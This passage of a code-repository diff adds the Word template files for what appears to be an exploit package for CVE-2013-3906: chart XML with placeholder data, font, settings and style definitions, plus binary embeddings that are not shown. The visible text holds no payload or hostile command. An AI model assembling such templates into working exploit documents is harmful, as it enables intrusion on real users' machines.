</c:ser>
<c:axId val="50940928"/>
<c:axId val="68729472"/>
<c:axId val="78014208"/>
</c:line3DChart>
<c:catAx>
<c:axId val="50940928"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68729472"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="50940928"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="between"/>
</c:valAx>
<c:serAx>
<c:axId val="78014208"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68729472"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

238
data/exploits/CVE-2013-3906/word/charts/chart6.xml Executable file
View File

@ -0,0 +1,238 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
<c:lang val="en-US"/>
<c:chart>
<c:view3D>
<c:perspective val="30"/>
</c:view3D>
<c:plotArea>
<c:layout/>
<c:surface3DChart>
<c:ser>
<c:idx val="0"/>
<c:order val="0"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$B$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 1</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$B$2:$B$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>4.3</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2.5</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3.5</c:v>
</c:pt>
<c:pt idx="3">
<c:v>4.5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="1"/>
<c:order val="1"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$C$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 2</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$C$2:$C$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2.4</c:v>
</c:pt>
<c:pt idx="1">
<c:v>4.4000000000000004</c:v>
</c:pt>
<c:pt idx="2">
<c:v>1.8</c:v>
</c:pt>
<c:pt idx="3">
<c:v>2.8</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:ser>
<c:idx val="2"/>
<c:order val="2"/>
<c:tx>
<c:strRef>
<c:f>Sheet1!$D$1</c:f>
<c:strCache>
<c:ptCount val="1"/>
<c:pt idx="0">
<c:v>Series 3</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:tx>
<c:cat>
<c:strRef>
<c:f>Sheet1!$A$2:$A$5</c:f>
<c:strCache>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>Category 1</c:v>
</c:pt>
<c:pt idx="1">
<c:v>Category 2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>Category 3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>Category 4</c:v>
</c:pt>
</c:strCache>
</c:strRef>
</c:cat>
<c:val>
<c:numRef>
<c:f>Sheet1!$D$2:$D$5</c:f>
<c:numCache>
<c:formatCode>General</c:formatCode>
<c:ptCount val="4"/>
<c:pt idx="0">
<c:v>2</c:v>
</c:pt>
<c:pt idx="1">
<c:v>2</c:v>
</c:pt>
<c:pt idx="2">
<c:v>3</c:v>
</c:pt>
<c:pt idx="3">
<c:v>5</c:v>
</c:pt>
</c:numCache>
</c:numRef>
</c:val>
</c:ser>
<c:bandFmts/>
<c:axId val="59304576"/>
<c:axId val="68746240"/>
<c:axId val="59572224"/>
</c:surface3DChart>
<c:catAx>
<c:axId val="59304576"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
<c:auto val="1"/>
<c:lblAlgn val="ctr"/>
<c:lblOffset val="100"/>
</c:catAx>
<c:valAx>
<c:axId val="68746240"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="l"/>
<c:majorGridlines/>
<c:numFmt formatCode="General" sourceLinked="1"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="59304576"/>
<c:crosses val="autoZero"/>
<c:crossBetween val="midCat"/>
</c:valAx>
<c:serAx>
<c:axId val="59572224"/>
<c:scaling>
<c:orientation val="minMax"/>
</c:scaling>
<c:axPos val="b"/>
<c:tickLblPos val="nextTo"/>
<c:crossAx val="68746240"/>
<c:crosses val="autoZero"/>
</c:serAx>
</c:plotArea>
<c:legend>
<c:legendPos val="r"/>
<c:layout/>
<c:txPr>
<a:bodyPr/>
<a:lstStyle/>
<a:p>
<a:pPr rtl="0">
<a:defRPr/>
</a:pPr>
<a:endParaRPr lang="en-US"/>
</a:p>
</c:txPr>
</c:legend>
<c:plotVisOnly val="1"/>
</c:chart>
<c:externalData r:id="rId1"/>
</c:chartSpace>

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet1.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet2.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet3.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet4.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet5.xlsx Executable file
View File

Binary file not shown.

BIN
data/exploits/CVE-2013-3906/word/embeddings/Microsoft_Office_Excel_Worksheet6.xlsx Executable file
View File

Binary file not shown.

31
data/exploits/CVE-2013-3906/word/fontTable.xml Executable file
View File

@ -0,0 +1,31 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:fonts xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:font w:name="Calibri">
<w:panose1 w:val="020F0502020204030204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="4000ACFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
<w:font w:name="Times New Roman">
<w:panose1 w:val="02020603050405020304"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E0002AFF" w:usb1="C0007841" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Tahoma">
<w:panose1 w:val="020B0604030504040204"/>
<w:charset w:val="CC"/>
<w:family w:val="swiss"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
</w:font>
<w:font w:name="Cambria">
<w:panose1 w:val="02040503050406030204"/>
<w:charset w:val="CC"/>
<w:family w:val="roman"/>
<w:pitch w:val="variable"/>
<w:sig w:usb0="E00002FF" w:usb1="400004FF" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
</w:font>
</w:fonts>

BIN
data/exploits/CVE-2013-3906/word/media/image1.jpeg Executable file
View File

Binary file not shown.

36
data/exploits/CVE-2013-3906/word/settings.xml Executable file
View File

@ -0,0 +1,36 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:settings xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:sl="http://schemas.openxmlformats.org/schemaLibrary/2006/main">
<w:zoom w:percent="100"/>
<w:proofState w:spelling="clean" w:grammar="clean"/>
<w:defaultTabStop w:val="708"/>
<w:characterSpacingControl w:val="doNotCompress"/>
<w:compat/>
<w:rsids>
<w:rsidRoot w:val="00D15BD0"/>
<w:rsid w:val="00D15BD0"/>
<w:rsid w:val="00F8254F"/>
</w:rsids>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr>
<w:themeFontLang w:val="en-US"/>
<w:clrSchemeMapping w:bg1="light1" w:t1="dark1" w:bg2="light2" w:t2="dark2" w:accent1="accent1" w:accent2="accent2" w:accent3="accent3" w:accent4="accent4" w:accent5="accent5" w:accent6="accent6" w:hyperlink="hyperlink" w:followedHyperlink="followedHyperlink"/>
<w:shapeDefaults>
<o:shapedefaults v:ext="edit" spidmax="1026"/>
<o:shapelayout v:ext="edit">
<o:idmap v:ext="edit" data="1"/>
</o:shapelayout>
</w:shapeDefaults>
<w:decimalSymbol w:val=","/>
<w:listSeparator w:val=";"/>
</w:settings>

220
data/exploits/CVE-2013-3906/word/styles.xml Executable file
View File

@ -0,0 +1,220 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<w:styles xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">
<w:docDefaults>
<w:rPrDefault>
<w:rPr>
<w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
<w:sz w:val="22"/>
<w:szCs w:val="22"/>
<w:lang w:val="en-US" w:bidi="ar-SA"/>
</w:rPr>
</w:rPrDefault>
<w:pPrDefault>
<w:pPr>
<w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
</w:pPr>
</w:pPrDefault>
</w:docDefaults>
<w:latentStyles w:defLockedState="0" w:defUIPriority="99" w:defSemiHidden="1" w:defUnhideWhenUsed="1" w:defQFormat="0" w:count="267">
<w:lsdException w:name="Normal" w:semiHidden="0" w:uiPriority="0" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 1" w:semiHidden="0" w:uiPriority="9" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="heading 2" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 3" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 4" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 5" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 6" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 7" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 8" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="heading 9" w:uiPriority="9" w:qFormat="1"/>
<w:lsdException w:name="toc 1" w:uiPriority="39"/>
<w:lsdException w:name="toc 2" w:uiPriority="39"/>
<w:lsdException w:name="toc 3" w:uiPriority="39"/>
<w:lsdException w:name="toc 4" w:uiPriority="39"/>
<w:lsdException w:name="toc 5" w:uiPriority="39"/>
<w:lsdException w:name="toc 6" w:uiPriority="39"/>
<w:lsdException w:name="toc 7" w:uiPriority="39"/>
<w:lsdException w:name="toc 8" w:uiPriority="39"/>
<w:lsdException w:name="toc 9" w:uiPriority="39"/>
<w:lsdException w:name="caption" w:uiPriority="35" w:qFormat="1"/>
<w:lsdException w:name="Title" w:semiHidden="0" w:uiPriority="10" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Default Paragraph Font" w:uiPriority="1"/>
<w:lsdException w:name="Subtitle" w:semiHidden="0" w:uiPriority="11" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Strong" w:semiHidden="0" w:uiPriority="22" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Emphasis" w:semiHidden="0" w:uiPriority="20" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Table Grid" w:semiHidden="0" w:uiPriority="59" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Placeholder Text" w:unhideWhenUsed="0"/>
<w:lsdException w:name="No Spacing" w:semiHidden="0" w:uiPriority="1" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Light Shading" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 1" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 1" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 1" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 1" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 1" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 1" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Revision" w:unhideWhenUsed="0"/>
<w:lsdException w:name="List Paragraph" w:semiHidden="0" w:uiPriority="34" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Quote" w:semiHidden="0" w:uiPriority="29" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Quote" w:semiHidden="0" w:uiPriority="30" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Medium List 2 Accent 1" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 1" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 1" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 1" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 1" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 1" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 1" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 1" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 2" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 2" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 2" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 2" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 2" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 2" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 2" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 2" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 2" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 2" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 2" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 2" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 2" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 2" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 3" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 3" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 3" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 3" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 3" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 3" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 3" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 3" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 3" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 3" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 3" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 3" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 3" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 3" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 4" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 4" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 4" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 4" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 4" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 4" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 4" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 4" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 4" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 4" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 4" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 4" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 4" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 4" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 5" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 5" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 5" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 5" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 5" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 5" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 5" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 5" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 5" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 5" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 5" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 5" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 5" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 5" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Shading Accent 6" w:semiHidden="0" w:uiPriority="60" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light List Accent 6" w:semiHidden="0" w:uiPriority="61" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Light Grid Accent 6" w:semiHidden="0" w:uiPriority="62" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 1 Accent 6" w:semiHidden="0" w:uiPriority="63" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Shading 2 Accent 6" w:semiHidden="0" w:uiPriority="64" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 1 Accent 6" w:semiHidden="0" w:uiPriority="65" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium List 2 Accent 6" w:semiHidden="0" w:uiPriority="66" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 1 Accent 6" w:semiHidden="0" w:uiPriority="67" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 2 Accent 6" w:semiHidden="0" w:uiPriority="68" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Medium Grid 3 Accent 6" w:semiHidden="0" w:uiPriority="69" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Dark List Accent 6" w:semiHidden="0" w:uiPriority="70" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Shading Accent 6" w:semiHidden="0" w:uiPriority="71" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful List Accent 6" w:semiHidden="0" w:uiPriority="72" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Colorful Grid Accent 6" w:semiHidden="0" w:uiPriority="73" w:unhideWhenUsed="0"/>
<w:lsdException w:name="Subtle Emphasis" w:semiHidden="0" w:uiPriority="19" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Emphasis" w:semiHidden="0" w:uiPriority="21" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Subtle Reference" w:semiHidden="0" w:uiPriority="31" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Intense Reference" w:semiHidden="0" w:uiPriority="32" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Book Title" w:semiHidden="0" w:uiPriority="33" w:unhideWhenUsed="0" w:qFormat="1"/>
<w:lsdException w:name="Bibliography" w:uiPriority="37"/>
<w:lsdException w:name="TOC Heading" w:uiPriority="39" w:qFormat="1"/>
</w:latentStyles>
<w:style w:type="paragraph" w:default="1" w:styleId="Normal">
<w:name w:val="Normal"/>
<w:qFormat/>
<w:rsid w:val="00063BF6"/>
</w:style>
<w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
<w:name w:val="Default Paragraph Font"/>
<w:uiPriority w:val="1"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="table" w:default="1" w:styleId="TableNormal">
<w:name w:val="Normal Table"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:qFormat/>
<w:tblPr>
<w:tblInd w:w="0" w:type="dxa"/>
<w:tblCellMar>
<w:top w:w="0" w:type="dxa"/>
<w:left w:w="108" w:type="dxa"/>
<w:bottom w:w="0" w:type="dxa"/>
<w:right w:w="108" w:type="dxa"/>
</w:tblCellMar>
</w:tblPr>
</w:style>
<w:style w:type="numbering" w:default="1" w:styleId="NoList">
<w:name w:val="No List"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
</w:style>
<w:style w:type="paragraph" w:styleId="BalloonText">
<w:name w:val="Balloon Text"/>
<w:basedOn w:val="Normal"/>
<w:link w:val="BalloonTextChar"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:unhideWhenUsed/>
<w:rsid w:val="00CD271A"/>
<w:pPr>
<w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
</w:pPr>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
<w:style w:type="character" w:customStyle="1" w:styleId="BalloonTextChar">
<w:name w:val="Balloon Text Char"/>
<w:basedOn w:val="DefaultParagraphFont"/>
<w:link w:val="BalloonText"/>
<w:uiPriority w:val="99"/>
<w:semiHidden/>
<w:rsid w:val="00CD271A"/>
<w:rPr>
<w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
<w:sz w:val="16"/>
<w:szCs w:val="16"/>
</w:rPr>
</w:style>
</w:styles>

283
data/exploits/CVE-2013-3906/word/theme/theme1.xml Executable file
View File

@ -0,0 +1,283 @@
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
